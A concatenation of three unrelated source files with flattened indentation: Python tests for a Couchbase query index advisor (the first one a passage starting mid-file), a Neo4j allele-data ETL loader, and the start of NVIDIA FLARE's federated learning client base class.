query1="SELECT DISTINCT MIN(aport.airportname) AS Airport_Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `travel-sample`.inventory.landmark aport LEFT JOIN `travel-sample`.inventory.landmark lmark ON aport.city = lmark.city AND lmark.country = 'United States' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='landmark', index='def_inventory_landmark_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, query_context=f"default:`{self.bucket_name}`.inventory", server=self.master)
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_negative_authorization(self):
self.users = [{"id": "jackDoe", "name": "Jack Downing", "password": "password1"}]
self.create_users()
role = "query_select"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant = self.run_cbq_query(query=f"GRANT {role} on `{self.bucket_name}` to {user_id}",server=self.master)
sessions_queries = ["SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", "SELECT ADVISOR({'action': 'list', 'status': 'all'})"]
error = "User does not have credentials to run queries accessing the system tables. Add role query_system_catalog to allow the query to run."
for query in sessions_queries:
try:
results = self.run_cbq_query(query=query, username=user_id, password=user_pwd, server=self.master)
self.fail("Start session did not fail. Error expected: {0}".format(error))
except CBQError as ex:
self.assertTrue(str(ex).find(error) > 0)
else:
self.fail("There were no errors. Error expected: {0}".format(error))
def test_session_authorization(self):
self.users = [{"id": "janneDoe", "name": "Janne Downing", "password": "password1"}]
self.create_users()
role_ctlg = "query_system_catalog"
role_qury = "query_select"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant_ctlg = self.run_cbq_query(query=f"GRANT {role_ctlg} to {user_id}",server=self.master)
grant_qury = self.run_cbq_query(query=f"GRANT {role_qury} on `{self.bucket_name}` to {user_id}",server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
try:
# Start session as authorized user
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", username=user_id, password=user_pwd, server=self.master)
session = start['results'][0]['$1']['session']
# Run query as other user
results = self.run_cbq_query(query=query1, server=self.master)
self.sleep(2)
# Stop and get session advise as authorized user
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", username=user_id, password=user_pwd, server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", username=user_id, password=user_pwd, server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
# Purge and list sessions as authorized user
purge = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'purge', 'session': '{session}'}})", username=user_id, password=user_pwd, server=self.master)
sessions = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", username=user_id, password=user_pwd, server=self.master)
self.assertEqual(sessions['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_authorization_other(self):
self.users = [{"id": "jeanDoe", "name": "Jean Downing", "password": "password1"}]
self.create_users()
role_ctlg = "query_system_catalog"
role_qury = "query_select"
user_id = self.users[0]['id']
user_pwd = self.users[0]['password']
grant_ctlg = self.run_cbq_query(query=f"GRANT {role_ctlg} to {user_id}",server=self.master)
grant_qury = self.run_cbq_query(query=f"GRANT {role_qury} on `{self.bucket_name}` to {user_id}",server=self.master)
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
try:
# Start session as current user
start = self.run_cbq_query(query="SELECT ADVISOR({'action': 'start', 'duration': '1h', 'query_count': 2 })", server=self.master)
session = start['results'][0]['$1']['session']
# Run query as current user
results = self.run_cbq_query(query=query1, server=self.master)
self.sleep(2)
# Stop and get session advise as authorized user
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'stop', 'session': '{session}'}}) as Stop", username=user_id, password=user_pwd, server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'get', 'session': '{session}'}}) as Get", username=user_id, password=user_pwd, server=self.master)
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
for statement in index['statements']:
self.assertEqual(statement['statement'], query1)
# Purge and list sessions as authorized user
purge = self.run_cbq_query(query=f"SELECT ADVISOR({{'action': 'purge', 'session': '{session}'}})", username=user_id, password=user_pwd, server=self.master)
sessions = self.run_cbq_query(query="SELECT ADVISOR({'action':'list', 'status': 'all'}) as List", username=user_id, password=user_pwd, server=self.master)
self.assertEqual(sessions['results'][0]['List'],[])
except Exception as e:
self.log.error("Advisor session failed: {0}".format(e))
self.fail()
def test_session_delete_completed_req(self):
advise_index1 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1=f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, server=self.master)
# Delete completed requests
delete = self.run_cbq_query(query=f"DELETE FROM system:completed_requests", server=self.master)
# Stop and get session
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
advise = get['results'][0]['Get'][0]
self.assertEqual(advise, [[]])
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_drop_collection(self):
advise_index1 = "CREATE INDEX adv_country_city ON `default`:`travel-sample`.`inventory`.`landmark`(`country`,`city`)"
advise_index2 = "CREATE INDEX adv_city_country ON `default`:`travel-sample`.`inventory`.`landmark`(`city`,`country`)"
query1="SELECT DISTINCT MIN(aport.airportname) AS Airport_Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `travel-sample`.inventory.landmark aport LEFT JOIN `travel-sample`.inventory.landmark lmark ON aport.city = lmark.city AND lmark.country = 'United States' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='landmark', index='def_inventory_landmark_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, server=self.master)
# Drop collection
drop_collection = self.run_cbq_query(query="DROP COLLECTION `travel-sample`.`inventory`.`landmark`", server=self.master)
# Stop and get session
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_drop_scope(self):
advise_index1 = "CREATE INDEX adv_country_city ON `default`:`travel-sample`.`inventory`.`landmark`(`country`,`city`)"
advise_index2 = "CREATE INDEX adv_city_country ON `default`:`travel-sample`.`inventory`.`landmark`(`city`,`country`)"
query1="SELECT DISTINCT MIN(aport.airportname) AS Airport_Name, MIN(lmark.name) AS Landmark_Name, MIN(aport.tz) AS Landmark_Time FROM `travel-sample`.inventory.landmark aport LEFT JOIN `travel-sample`.inventory.landmark lmark ON aport.city = lmark.city AND lmark.country = 'United States' GROUP BY lmark.name ORDER BY lmark.name LIMIT 3"
self.wait_for_index_online(bucket='travel-sample', scope='inventory', collection='landmark', index='def_inventory_landmark_primary')
try:
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=self.master)
session = start['results'][0]['$1']['session']
# Run query in bucket.collection context
results = self.run_cbq_query(query=query1, server=self.master)
# Drop scope
drop_scope = self.run_cbq_query(query="DROP SCOPE `travel-sample`.`inventory`", server=self.master)
# Stop and get session
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=self.master)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=self.master)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_kill_index(self):
advise_index1 = "CREATE INDEX adv_country_lower_city_type ON `travel-sample`(`country`,lower(`city`)) WHERE `type` = 'airport'"
advise_index2 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1 = f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
node1 = self.servers[0]
node2 = self.servers[1]
try:
# Start session on node1
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=node1)
session = start['results'][0]['$1']['session']
# Run query on node1
results = self.run_cbq_query(query=query1, server=node1)
# Kill index service on node1
remote_client = RemoteMachineShellConnection(node1)
remote_client.terminate_process(process_name="indexer")
self.sleep(3)
# Stop session on node2
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=node2)
# Get session on node1
self.sleep(2)
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=node1)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
self.assertEqual(index['statements'][0]['run_count'], 1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_kill_query(self):
advise_index1 = "CREATE INDEX adv_country_lower_city_type ON `travel-sample`(`country`,lower(`city`)) WHERE `type` = 'airport'"
advise_index2 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1 = f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
node1 = self.servers[0]
node2 = self.servers[1]
try:
# Start session on node2
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=node2)
session = start['results'][0]['$1']['session']
# Run query on node2
results = self.run_cbq_query(query=query1, server=node2)
# Kill n1ql service on node2
remote_client = RemoteMachineShellConnection(node2)
remote_client.terminate_process(process_name="cbq-engine")
self.sleep(3)
# Stop session on node1
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=node1)
# List session
self.sleep(1)
list_node1 = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'list'}}) as List", server=node1)
statement1 = list_node1['results'][0]['List'][0]['tasks_cache']['results'][0]['recommended_indexes'][0]['statements'][0]['statement']
# Check advise
self.assertEqual(statement1, query1)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
def test_session_multi_node(self):
advise_index1 = "CREATE INDEX adv_country_lower_city_type ON `travel-sample`(`country`,lower(`city`)) WHERE `type` = 'airport'"
advise_index2 = "CREATE INDEX adv_lower_city_country_type ON `travel-sample`(lower(`city`),`country`) WHERE `type` = 'airport'"
query1 = f'SELECT airportname FROM `{self.bucket_name}` WHERE type = "airport" AND lower(city) = "lyon" AND country = "France"'
node1 = self.servers[0]
node2 = self.servers[1]
try:
# Start session on node1
start = self.run_cbq_query(query="SELECT ADVISOR({'action':'start', 'duration':'40m'})", server=node1)
session = start['results'][0]['$1']['session']
# Run query on node2
results = self.run_cbq_query(query=query1, server=node2)
# Run query on node1
results = self.run_cbq_query(query=query1, server=node1)
# Stop session on node1
stop = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'stop', 'session':'{session}'}}) as Stop", server=node1)
# Get session on node2
get = self.run_cbq_query(query=f"SELECT ADVISOR({{'action':'get', 'session':'{session}'}}) as Get", server=node2)
# Check advise
for index in get['results'][0]['Get'][0][0]['recommended_indexes']:
self.assertTrue(index['index'] == advise_index1 or index['index'] == advise_index2)
self.assertEqual(index['statements'][0]['statement'], query1)
self.assertEqual(index['statements'][0]['run_count'], 2)
except Exception as e:
self.log.error(f"Advisor session failed: {e}")
self.fail()
|
allele_etl.py
|
"""Allele ETL."""
import logging
import multiprocessing
import uuid
from etl import ETL
from etl.helpers import ETLHelper
from etl.helpers import TextProcessingHelper
from files import JSONFile
from transactors import CSVTransactor, Neo4jTransactor
logger = logging.getLogger(__name__)
class AlleleETL(ETL):
"""Call AlleleETL."""
allele_construct_no_gene_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (c:Construct {primaryKey: row.constructId})
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
MERGE (o)-[:CONTAINS]-(c) """
allele_construct_gene_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {primaryKey: row.geneId})
MATCH (c:Construct {primaryKey: row.constructId})
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
MERGE (o)-[:IS_ALLELE_OF]-(g)
MERGE (o)-[:CONTAINS]-(c) """
allele_gene_no_construct_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (g:Gene {primaryKey: row.geneId})
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
MERGE (o)-[:IS_ALLELE_OF]->(g) """
allele_no_gene_no_construct_query_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (s:Species {primaryKey: row.taxonId})
//Create the Allele node and set properties. primaryKey is required.
MERGE (o:Allele:Feature {primaryKey:row.primaryId})
ON CREATE SET o.symbol = row.symbol,
o.taxonId = row.taxonId,
o.dateProduced = row.dateProduced,
o.release = row.release,
o.localId = row.localId,
o.globalId = row.globalId,
o.uuid = row.uuid,
o.symbolText = row.symbolText,
o.modCrossRefCompleteUrl = row.modGlobalCrossRefId,
o.dataProviders = row.dataProviders,
o.dataProvider = row.dataProvider,
o.symbolWithSpecies = row.symbolWithSpecies,
o.symbolTextWithSpecies = row.symbolTextWithSpecies,
o.description = row.alleleDescription
MERGE (o)-[:FROM_SPECIES]-(s)
"""
allele_secondaryids_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (f:Allele:Feature {primaryKey:row.data_id})
MERGE (second:SecondaryId {primaryKey:row.secondary_id})
SET second.name = row.secondary_id
MERGE (f)-[aka1:ALSO_KNOWN_AS]->(second) """
allele_synonyms_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (a:Allele:Feature {primaryKey:row.data_id})
MERGE(syn:Synonym {primaryKey:row.synonym})
SET syn.name = row.synonym
MERGE (a)-[aka2:ALSO_KNOWN_AS]->(syn) """
allele_xrefs_template = """
USING PERIODIC COMMIT %s
LOAD CSV WITH HEADERS FROM \'file:///%s\' AS row
MATCH (o:Allele {primaryKey:row.dataId}) """ + ETLHelper.get_cypher_xref_text()
def __init__(self, config):
"""Initialise Object."""
super().__init__()
self.data_type_config = config
def _load_and_process_data(self):
thread_pool = []
for sub_type in self.data_type_config.get_sub_type_objects():
p = multiprocessing.Process(target=self._process_sub_type, args=(sub_type,))
p.start()
thread_pool.append(p)
ETL.wait_for_threads(thread_pool)
def _process_sub_type(self, sub_type):
logger.info("Loading Allele Data: %s" % sub_type.get_data_provider())
filepath = sub_type.get_filepath()
logger.info(filepath)
data = JSONFile().get_data(filepath)
if data is None:
logger.warn("No Data found for %s skipping" % sub_type.get_data_provider())
return
# This order is the same as the lists yielded from the get_generators function.
# A list of tuples.
commit_size = self.data_type_config.get_neo4j_commit_size()
batch_size = self.data_type_config.get_generator_batch_size()
# This needs to be in this format (template, param1, params2) others will be ignored
query_list = [
[AlleleETL.allele_gene_no_construct_query_template, commit_size,
"allele_gene_no_construct_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_construct_gene_query_template, commit_size,
"allele_construct_gene_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_construct_no_gene_query_template, commit_size,
"allele_construct_no_gene_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_no_gene_no_construct_query_template, commit_size,
"allele_no_gene_no_construct_data_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_secondaryids_template, commit_size,
"allele_secondaryids_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_synonyms_template, commit_size,
"allele_synonyms_" + sub_type.get_data_provider() + ".csv"],
[AlleleETL.allele_xrefs_template, commit_size, "allele_xrefs_" + sub_type.get_data_provider() + ".csv"],
]
# Obtain the generator
generators = self.get_generators(data, batch_size)
query_and_file_list = self.process_query_params(query_list)
CSVTransactor.save_file_static(generators, query_and_file_list)
Neo4jTransactor.execute_query_batch(query_and_file_list)
self.error_messages("Allele-{}: ".format(sub_type.get_data_provider()))
logger.info("Finished Loading Allele Data: %s" % sub_type.get_data_provider())
def secondary_process(self, secondarys, data_record):
"""Get secondary ids.
secondarys: list of dataset items.
data_record: record to process.
"""
if data_record.get('secondaryIds') is None:
return
for sid in data_record.get('secondaryIds'):
secondary_id_dataset = {
"data_id": data_record.get('primaryId'),
"secondary_id": sid
}
secondarys.append(secondary_id_dataset)
def synonyms_process(self, synonyms, data_record):
"""Get synonyms."""
if data_record.get('synonyms') is None:
return
for syn in data_record.get('synonyms'):
syn_dataset = {
"data_id": data_record.get('primaryId'),
"synonym": syn.strip()
}
synonyms.append(syn_dataset)
def crossref_process(self, record, global_id, cross_reference_list):
"""Get xref."""
valid_pages = ['allele', 'allele/references', 'transgene', 'construct',
'transgene/references', 'construct/references']
if 'crossReferences' not in record:
return
for crossRef in record['crossReferences']:
crossRefId = crossRef.get('id')
local_crossref_id = crossRefId.split(":")[1]
prefix = crossRef.get('id').split(":")[0]
pages = crossRef.get('pages')
# some pages collection have 0 elements
if pages is not None and len(pages) > 0:
for page in pages:
if page in valid_pages:
mod_global_cross_ref_id = self.etlh.rdh2.return_url_from_key_value(prefix, local_crossref_id, page)
xref = ETLHelper.get_xref_dict(local_crossref_id, prefix, page, page, crossRefId,
mod_global_cross_ref_id, crossRefId + page)
xref['dataId'] = global_id
cross_reference_list.append(xref)
def get_generators(self, allele_data, batch_size): # noqa
"""Get generators."""
release = ""
alleles_no_constrcut_no_gene = []
alleles_construct_gene = []
alleles_no_construct = []
alleles_no_gene = []
allele_synonyms = []
allele_secondary_ids = []
cross_reference_list = []
counter = 0
date_produced = allele_data['metaData']['dateProduced']
# TODO: get SGD to fix their files.
self.data_providers_process(allele_data)
loadKey = date_produced + self.data_provider + "_ALLELE"
if 'release' in allele_data['metaData']:
release = allele_data['metaData']['release']
for allele_record in allele_data['data']:
counter = counter + 1
global_id = allele_record['primaryId']
# fixing parsing error on this end while MGI fixes on their end.
if global_id == 'MGI:3826848':
description = allele_record.get('description')[:-2]
else:
description = allele_record.get('description')
local_id = global_id.split(":")[1]
mod_global_cross_ref_id = ""
if self.test_object.using_test_data() is True:
is_it_test_entry = self.test_object.check_for_test_id_entry(global_id)
if is_it_test_entry is False:
counter = counter - 1
continue
association_type = ''
short_species_abbreviation = self.etlh.get_short_species_abbreviation(allele_record.get('taxonId'))
symbol_text = TextProcessingHelper.cleanhtml(allele_record.get('symbol'))
if allele_record.get('alleleObjectRelations') is not None:
for relation in allele_record.get('alleleObjectRelations'):
gene_id = ''
construct_id = ''
common = {
"alleleDescription": description,
"associationType": association_type,
"symbol": allele_record.get('symbol'),
"globalId": global_id,
"localId": local_id,
"taxonId": allele_record.get('taxonId'),
"dataProvider": self.data_provider,
"dataProviders": self.data_providers,
"dateProduced": date_produced,
"loadKey": loadKey,
"release": release,
"modGlobalCrossRefId": mod_global_cross_ref_id,
"symbolWithSpecies": allele_record.get('symbol') + " (" + short_species_abbreviation + ")",
"symbolTextWithSpecies": symbol_text + " (" + short_species_abbreviation + ")",
"symbolText": symbol_text,
"primaryId": allele_record.get('primaryId'),
"uuid": str(uuid.uuid4())
}
association_type = relation.get('objectRelation').get('associationType')
if relation.get('objectRelation').get('gene') is not None:
gene_id = relation.get('objectRelation').get('gene')
if relation.get('objectRelation').get('construct') is not None:
construct_id = relation.get('objectRelation').get('construct')
if gene_id != '' and construct_id != '':
common["geneId"] = gene_id
common["constructId"] = construct_id
alleles_construct_gene.append(common)
elif construct_id != '' and gene_id == '':
common["constructId"] = construct_id
common.pop('geneId', None)
alleles_no_gene.append(common)
elif gene_id != '' and construct_id == '':
common["geneId"] = gene_id
common.pop('constructId', None)
alleles_no_construct.append(common)
elif gene_id == '' and construct_id == '':
common.pop('geneId', None)
common.pop('constructId', None)
alleles_no_constrcut_no_gene.append(common)
else:
common = {
"alleleDescription": description,
"associationType": association_type,
"symbol": allele_record.get('symbol'),
"globalId": global_id,
"localId": local_id,
"taxonId": allele_record.get('taxonId'),
"dataProvider": self.data_provider,
"dataProviders": self.data_providers,
"dateProduced": date_produced,
"loadKey": loadKey,
"release": release,
"modGlobalCrossRefId": mod_global_cross_ref_id,
"symbolWithSpecies": allele_record.get('symbol') + " (" + short_species_abbreviation + ")",
"symbolTextWithSpecies": symbol_text + " (" + short_species_abbreviation + ")",
"symbolText": symbol_text,
"primaryId": allele_record.get('primaryId'),
"uuid": str(uuid.uuid4())
}
alleles_no_constrcut_no_gene.append(common)
self.crossref_process(allele_record, global_id, cross_reference_list)
self.synonyms_process(allele_synonyms, allele_record)
self.secondary_process(allele_secondary_ids, allele_record)
if counter == batch_size:
yield [alleles_no_construct, alleles_construct_gene, alleles_no_gene, alleles_no_constrcut_no_gene,
allele_secondary_ids, allele_synonyms, cross_reference_list]
alleles_no_construct = []
alleles_construct_gene = []
alleles_no_gene = []
alleles_no_constrcut_no_gene = []
allele_secondary_ids = []
allele_synonyms = []
cross_reference_list = []
counter = 0
if counter > 0:
yield [alleles_no_construct, alleles_construct_gene, alleles_no_gene, alleles_no_constrcut_no_gene,
allele_secondary_ids, allele_synonyms, cross_reference_list]
|
fed_client_base.py
|
# Copyright (c) 2021-2022, NVIDIA CORPORATION. All rights reserved.
#
# Licensed under the Apache License, Version 2.0 (the "License");
# you may not use this file except in compliance with the License.
# You may obtain a copy of the License at
#
# http://www.apache.org/licenses/LICENSE-2.0
#
# Unless required by applicable law or agreed to in writing, software
# distributed under the License is distributed on an "AS IS" BASIS,
# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.
# See the License for the specific language governing permissions and
# limitations under the License.
import logging
import threading
import time
from functools import partial
from multiprocessing.dummy import Pool as ThreadPool
from typing import List, Optional
from nvflare.apis.filter import Filter
from nvflare.apis.fl_component import FLComponent
from nvflare.apis.fl_constant import FLContextKey
from nvflare.apis.fl_context import FLContext
from nvflare.apis.fl_exception import FLCommunicationError
from nvflare.apis.overseer_spec import SP
from nvflare.apis.shareable import Shareable
from nvflare.apis.signal import Signal
from nvflare.fuel.utils.argument_utils import parse_vars
from nvflare.private.defs import EngineConstant
from .client_status import ClientStatus
from .communicator import Communicator
class FederatedClientBase:
"""The client-side base implementation of federated learning.
This class provide the tools function which will be used in both FedClient and FedClientLite.
"""
def __init__(
self,
client_name,
client_args,
secure_train,
server_args=None,
retry_timeout=30,
client_state_processors: Optional[List[Filter]] = None,
handlers: Optional[List[FLComponent]] = None,
compression=None,
overseer_agent=None,
args=None,
components=None,
):
"""To init FederatedClientBase.
Args:
client_name: client name
client_args: client config args
secure_train: True/False to indicate secure train
server_args: server config args
retry_timeout: retry timeout
client_state_processors: client state processor filters
handlers: handlers
compression: communication compression algorithm
"""
self.logger = logging.getLogger(self.__class__.__name__)
self.client_name = client_name
self.token = None
self.ssid = None
self.client_args = client_args
self.servers = server_args
self.communicator = Communicator(
ssl_args=client_args,
secure_train=secure_train,
retry_timeout=retry_timeout,
client_state_processors=client_state_processors,
compression=compression,
)
self.secure_train = secure_train
self.handlers = handlers
self.components = components
self.heartbeat_done = False
self.fl_ctx = FLContext()
self.platform = None
self.abort_signal = Signal()
self.engine = None
self.status = ClientStatus.NOT_STARTED
self.remote_tasks = None
self.sp_established = False
self.overseer_agent = overseer_agent
self.overseer_agent = self._init_agent(args)
if secure_train:
if self.overseer_agent:
self.overseer_agent.set_secure_context(
ca_path=client_args["ssl_root_cert"],
cert_path=client_args["ssl_cert"],
prv_key_path=client_args["ssl_private_key"],
)
self.overseer_agent.start(self.overseer_callback)
def _init_agent(self, args=None):
kv_list = parse_vars(args.set)
sp = kv_list.get("sp")
if sp:
fl_ctx = FLContext()
fl_ctx.set_prop(FLContextKey.SP_END_POINT, sp)
self.overseer_agent.initialize(fl_ctx)
return self.overseer_agent
def overseer_callback(self, overseer_agent):
if overseer_agent.is_shutdown():
self.engine.shutdown()
return
sp = overseer_agent.get_primary_sp()
self.set_primary_sp(sp)
def set_sp(self, project_name, sp: SP):
if sp and sp.primary is True:
server = self.servers[project_name].get("target")
location = sp.name + ":" + sp.fl_port
if server != location:
self.servers[project_name]["target"] = location
self.sp_established = True
self.logger.info(f"Got the new primary SP: {location}")
if self.ssid and self.ssid != sp.service_session_id:
self.ssid = sp.service_session_id
thread = threading.Thread(target=self._switch_ssid)
thread.start()
def _switch_ssid(self):
if self.engine:
for job_id in self.engine.get_all_job_ids():
self.engine.abort_task(job_id)
# self.register()
self.logger.info(f"Primary SP switched to new SSID: {self.ssid}")
def client_register(self, project_name):
"""Register the client to the FL server.
Args:
project_name: FL study project name.
"""
if not self.token:
try:
self.token, self.ssid = self.communicator.client_registration(
self.client_name, self.servers, project_name
)
if self.token is not None:
self.fl_ctx.set_prop(FLContextKey.CLIENT_NAME, self.client_name, private=False)
self.fl_ctx.set_prop(EngineConstant.FL_TOKEN, self.token, private=False)
self.logger.info(
"Successfully registered client:{} for project {}. Token:{} SSID:{}".format(
self.client_name, project_name, self.token, self.ssid
)
)
except FLCommunicationError:
self.communicator.heartbeat_done = True
def fetch_execute_task(self, project_name, fl_ctx: FLContext):
"""Fetch a task from the server.
Args:
project_name: FL study project name
fl_ctx: FLContext
Returns:
A CurrentTask message from server
"""
try:
self.logger.debug("Starting to fetch execute task.")
task = self.communicator.getTask(self.servers, project_name, self.token, self.ssid, fl_ctx)
return task
except FLCommunicationError as e:
self.logger.info(e)
def push_execute_result(self, project_name, shareable: Shareable, fl_ctx: FLContext):
"""Submit execution results of a task to server.
Args:
project_name: FL study project name
shareable: Shareable object
fl_ctx: FLContext
Returns:
A FederatedSummary message from the server.
"""
try:
self.logger.info("Starting to push execute result.")
execute_task_name = fl_ctx.get_prop(FLContextKey.TASK_NAME)
